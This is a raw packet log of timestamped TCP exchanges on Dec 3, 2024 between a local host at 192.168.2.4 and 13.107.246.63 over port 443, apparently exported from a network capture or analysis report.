                                                                        Dec 3, 2024 17:51:51.821569920 CET49965443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:51.821574926 CET4434996513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:51.824306965 CET49969443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:51.824341059 CET4434996913.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:51.824407101 CET49969443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:51.824623108 CET49969443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:51.824635983 CET4434996913.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:51.900635004 CET4434996113.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:51.900659084 CET4434996113.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:51.900712013 CET4434996113.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:51.900712013 CET49961443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:51.900752068 CET49961443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:51.900886059 CET49961443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:51.900907993 CET4434996113.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:51.900918007 CET49961443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:51.900923967 CET4434996113.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:51.903852940 CET49970443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:51.903875113 CET4434997013.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:51.903940916 CET49970443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:51.904066086 CET49970443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:51.904078960 CET4434997013.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:52.102190971 CET4434996713.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:52.102984905 CET49967443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:52.103012085 CET4434996713.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:52.103914022 CET49967443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:52.103919983 CET4434996713.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:52.254451036 CET4434996613.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:52.257780075 CET4434996613.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:52.257967949 CET49966443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:52.258009911 CET49966443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:52.258028984 CET4434996613.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:52.258040905 CET49966443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:52.258047104 CET4434996613.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:52.260894060 CET49971443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:52.260940075 CET4434997113.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:52.261085987 CET49971443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:52.261262894 CET49971443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:52.261281967 CET4434997113.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:52.395936966 CET4434996813.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:52.396832943 CET49968443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:52.396864891 CET4434996813.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:52.397285938 CET49968443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:52.397290945 CET4434996813.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:52.560215950 CET4434996713.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:52.563222885 CET4434996713.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:52.563288927 CET49967443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:52.563292980 CET4434996713.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:52.563344002 CET49967443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:52.563400030 CET49967443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:52.563419104 CET4434996713.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:52.563430071 CET49967443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:52.563436031 CET4434996713.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:52.566247940 CET49972443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:52.566272020 CET4434997213.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:52.566344023 CET49972443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:52.566485882 CET49972443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:52.566490889 CET4434997213.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:52.845586061 CET4434996813.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:52.848722935 CET4434996813.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:52.848783016 CET49968443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:52.848845959 CET49968443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:52.848845959 CET49968443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:52.848865032 CET4434996813.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:52.848867893 CET4434996813.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:52.851655960 CET49973443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:52.851711035 CET4434997313.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:52.851811886 CET49973443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:52.851984024 CET49973443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:52.851999998 CET4434997313.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:53.834345102 CET4434997013.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:53.834785938 CET49970443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:53.834815025 CET4434997013.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:53.835256100 CET49970443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:53.835261106 CET4434997013.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:53.837038040 CET4434996913.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:53.837312937 CET49969443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:53.837333918 CET4434996913.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:53.837667942 CET49969443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:53.837673903 CET4434996913.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:54.243717909 CET4434997113.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:54.244244099 CET49971443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:54.244265079 CET4434997113.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:54.244708061 CET49971443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:54.244713068 CET4434997113.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:54.269635916 CET4434997013.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:54.269884109 CET4434997013.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:54.269959927 CET49970443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:54.269998074 CET49970443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:54.270019054 CET4434997013.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:54.270030022 CET49970443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:54.270036936 CET4434997013.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:54.273046970 CET49974443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:54.273086071 CET4434997413.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:54.273175001 CET49974443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:54.273344994 CET49974443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:54.273359060 CET4434997413.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:54.291064024 CET4434996913.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:54.293941021 CET4434996913.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:54.293992043 CET4434996913.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:54.294008017 CET49969443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:54.294050932 CET49969443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:54.294110060 CET49969443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:54.294125080 CET4434996913.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:54.294137955 CET49969443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:54.294143915 CET4434996913.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:54.296897888 CET49975443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:54.296936989 CET4434997513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:54.297009945 CET49975443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:54.297149897 CET49975443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:54.297166109 CET4434997513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:54.514153957 CET4434997213.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:54.514846087 CET49972443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:54.514889956 CET4434997213.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:54.515341997 CET49972443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:54.515347958 CET4434997213.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:54.690246105 CET4434997113.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:54.693722010 CET4434997113.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:54.693787098 CET4434997113.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:54.693811893 CET49971443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:54.693856955 CET49971443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:54.693921089 CET49971443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:54.693934917 CET4434997113.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:54.693965912 CET49971443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:54.693972111 CET4434997113.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:54.697025061 CET49976443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:54.697081089 CET4434997613.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:54.697170973 CET49976443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:54.697355032 CET49976443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:54.697370052 CET4434997613.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:54.706383944 CET4434997313.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:54.707298040 CET49973443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:54.707326889 CET4434997313.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:54.707926989 CET49973443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:54.707937002 CET4434997313.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:54.969297886 CET4434997213.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:54.969383001 CET4434997213.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:54.969440937 CET49972443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:54.969621897 CET49972443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:54.969651937 CET4434997213.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:54.969667912 CET49972443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:54.969674110 CET4434997213.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:54.972855091 CET49977443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:54.972908020 CET4434997713.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:54.972974062 CET49977443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:54.973119974 CET49977443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:54.973135948 CET4434997713.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:55.170352936 CET4434997313.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:55.170443058 CET4434997313.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:55.170504093 CET49973443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:55.170698881 CET49973443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:55.170722008 CET4434997313.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:55.170732975 CET49973443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:55.170738935 CET4434997313.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:55.174012899 CET49978443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:55.174065113 CET4434997813.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:55.174135923 CET49978443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:55.174273968 CET49978443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:55.174285889 CET4434997813.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:56.182048082 CET4434997413.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:56.182674885 CET49974443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:56.182712078 CET4434997413.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:56.183128119 CET49974443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:56.183134079 CET4434997413.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:56.228183985 CET4434997513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:56.229398966 CET49975443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:56.229417086 CET4434997513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:56.229854107 CET49975443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:56.229860067 CET4434997513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:56.601073980 CET4434997613.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:56.601655960 CET49976443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:56.601680040 CET4434997613.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:56.602516890 CET49976443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:56.602524042 CET4434997613.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:56.632810116 CET4434997413.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:56.636594057 CET4434997413.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:56.636641979 CET4434997413.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:56.636717081 CET49974443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:56.636760950 CET49974443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:56.636760950 CET49974443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:56.636781931 CET4434997413.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:56.636785984 CET4434997413.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:56.639524937 CET49979443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:56.639569044 CET4434997913.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:56.639647007 CET49979443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:56.639812946 CET49979443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:56.639827013 CET4434997913.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:56.686800957 CET4434997513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:56.689682007 CET4434997513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:56.689754963 CET49975443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:56.689791918 CET49975443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:56.689806938 CET4434997513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:56.689821959 CET49975443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:56.689826965 CET4434997513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:56.692658901 CET49980443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:56.692712069 CET4434998013.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:56.692799091 CET49980443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:56.692965984 CET49980443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:56.692984104 CET4434998013.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:56.870811939 CET4434997713.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:56.871450901 CET49977443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:56.871483088 CET4434997713.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:56.872004032 CET49977443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:56.872011900 CET4434997713.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:57.252978086 CET4434997813.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:57.253534079 CET49978443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:57.253552914 CET4434997813.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:57.254019976 CET49978443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:57.254024029 CET4434997813.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:57.274905920 CET4434997613.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:57.277067900 CET4434997613.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:57.277256012 CET49976443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:57.277256012 CET49976443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:57.277256012 CET49976443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:57.279956102 CET49981443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:57.279993057 CET4434998113.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:57.280076981 CET49981443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:57.280250072 CET49981443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:57.280260086 CET4434998113.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:57.340573072 CET4434997713.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:57.340601921 CET4434997713.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:57.340657949 CET4434997713.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:57.340687037 CET49977443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:57.340841055 CET49977443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:57.340966940 CET49977443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:57.340981960 CET4434997713.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:57.340991974 CET49977443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:57.340996027 CET4434997713.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:57.344213963 CET49982443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:57.344257116 CET4434998213.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:57.344340086 CET49982443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:57.344472885 CET49982443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:57.344489098 CET4434998213.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:57.584899902 CET49976443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:57.584933996 CET4434997613.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:57.703422070 CET4434997813.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:57.706921101 CET4434997813.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:57.707020998 CET49978443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:57.707446098 CET49978443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:57.707465887 CET4434997813.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:57.707479000 CET49978443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:57.707484961 CET4434997813.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:57.710990906 CET49983443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:57.711045980 CET4434998313.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:57.711128950 CET49983443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:57.713421106 CET49983443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:57.713433027 CET4434998313.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:58.582259893 CET4434997913.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:58.582784891 CET49979443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:58.582828045 CET4434997913.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:58.583349943 CET49979443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:58.583360910 CET4434997913.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:58.656569958 CET4434998013.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:58.657149076 CET49980443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:58.657166958 CET4434998013.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:58.657639980 CET49980443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:58.657648087 CET4434998013.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:59.083458900 CET4434997913.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:59.086735010 CET4434997913.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:59.086788893 CET4434997913.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:59.086805105 CET49979443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:59.086838961 CET49979443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:59.086895943 CET49979443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:59.086910963 CET4434997913.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:59.086925030 CET49979443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:59.086930037 CET4434997913.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:59.089751005 CET49984443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:59.089792967 CET4434998413.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:59.089865923 CET49984443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:59.090003014 CET49984443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:59.090013027 CET4434998413.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:59.097723007 CET4434998113.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:59.098170996 CET49981443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:59.098182917 CET4434998113.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:59.098619938 CET49981443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:59.098624945 CET4434998113.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:59.144129992 CET4434998013.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:59.147397995 CET4434998013.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:59.147454977 CET49980443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:59.147491932 CET49980443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:59.147511959 CET4434998013.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:59.147521973 CET49980443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:59.147527933 CET4434998013.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:59.150394917 CET49985443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:59.150423050 CET4434998513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:59.150482893 CET49985443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:59.150616884 CET49985443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:59.150626898 CET4434998513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:59.228507996 CET4434998213.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:59.229110003 CET49982443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:59.229135990 CET4434998213.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:59.229577065 CET49982443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:59.229587078 CET4434998213.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:59.551069975 CET4434998113.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:59.554603100 CET4434998113.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:59.554693937 CET49981443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:59.554763079 CET49981443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:59.554775953 CET4434998113.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:59.554790020 CET49981443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:59.554795027 CET4434998113.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:59.557707071 CET49986443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:59.557722092 CET4434998613.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:59.557785988 CET49986443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:59.557952881 CET49986443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:59.557965040 CET4434998613.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:59.594893932 CET4434998313.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:59.595668077 CET49983443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:59.595680952 CET4434998313.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:59.596183062 CET49983443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:59.596188068 CET4434998313.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:59.687031031 CET4434998213.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:59.689870119 CET4434998213.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:59.689924002 CET4434998213.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:59.689985991 CET49982443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:59.690037966 CET49982443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:59.690187931 CET49982443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:59.690206051 CET4434998213.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:59.690216064 CET49982443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:59.690222025 CET4434998213.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:59.692723036 CET49987443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:59.692750931 CET4434998713.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:59.692867041 CET49987443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:59.693000078 CET49987443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:59.693012953 CET4434998713.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:00.039613008 CET4434998313.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:00.042581081 CET4434998313.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:00.046520948 CET49983443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:00.046586037 CET49983443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:00.046603918 CET4434998313.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:00.046616077 CET49983443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:00.046622038 CET4434998313.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:00.049360037 CET49988443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:00.049412966 CET4434998813.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:00.049509048 CET49988443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:00.049626112 CET49988443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:00.049639940 CET4434998813.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:01.021275997 CET4434998413.107.246.63192.168.2.4
